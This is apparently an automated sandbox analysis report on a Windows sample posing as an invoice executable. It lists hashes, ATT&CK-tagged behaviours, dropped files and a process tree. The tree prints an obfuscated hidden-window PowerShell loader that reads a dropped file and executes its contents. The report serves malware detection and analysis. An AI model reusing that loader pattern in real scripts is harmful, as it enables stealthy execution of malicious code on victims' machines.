Analysis
-
max time kernel
94s -
max time network
100s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
05-09-2024 09:18
Static task
static1
Behavioral task
behavioral1
Sample
INV9876545678900.exe
Resource
win7-20240903-en
General
-
Target
INV9876545678900.exe
-
Size
550KB
-
MD5
247f47ee3588a622902610a70d3576bc
-
SHA1
bf19df5857fc552b60284a8ece79f99b5fd6986b
-
SHA256
28ea8947fa78ef77e6bb3c870348a5d578676737c5e5a0a258d46db72b54aa18
-
SHA512
4ec7dfb15368b37e13cf775d8b8896bee729ee723e03186e9d5f8d87da1576cb6d6feea4e51535dd8563ceec6a279d9eeff8673a160847de911c81efa24c0617
-
SSDEEP
12288:jHYHEW/ubbGn+71CMDRRqz3+EYfaVOjfLPSuwrg:UGHpLRRqb9k/3PSux
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 4796 powershell.exe -
Drops file in Program Files directory 1 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Common Files\bagvaskerne.Lin INV9876545678900.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 1032 4796 WerFault.exe 83 -
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language INV9876545678900.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 4796 powershell.exe 4796 powershell.exe 4796 powershell.exe 4796 powershell.exe 4796 powershell.exe 4796 powershell.exe 4796 powershell.exe 4796 powershell.exe 4796 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4796 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1220 wrote to memory of 4796 1220 INV9876545678900.exe 83 PID 1220 wrote to memory of 4796 1220 INV9876545678900.exe 83 PID 1220 wrote to memory of 4796 1220 INV9876545678900.exe 83
Processes
-
C:\Users\Admin\AppData\Local\Temp\INV9876545678900.exe"C:\Users\Admin\AppData\Local\Temp\INV9876545678900.exe"1⤵
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1220 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Slvmedaljes47=Get-Content 'C:\Users\Admin\AppData\Local\firtakterens\Vids.Sil74';$Tinfoliens147=$Slvmedaljes47.SubString(2012,3);.$Tinfoliens147($Slvmedaljes47)"2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4796 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4796 -s 26963⤵
- Program crash
PID:1032
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4796 -ip 47961⤵PID:4800
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
69KB
MD5f36506269814aa6626699bae20298473
SHA124e5e443b61b3614b81e0a065686b129e250e354
SHA256dab290d347f76a5a638fb547ef4f21e3e43bc4b747b5700349afd6ec08d15a11
SHA512a4f49f55e8871f938594cd6e18b4780cbe898c0344bc26455709ccebe80b92ba124e43d6099e9dee530a91465399498d88bd077182c3f1ca18ed1335ef1726b2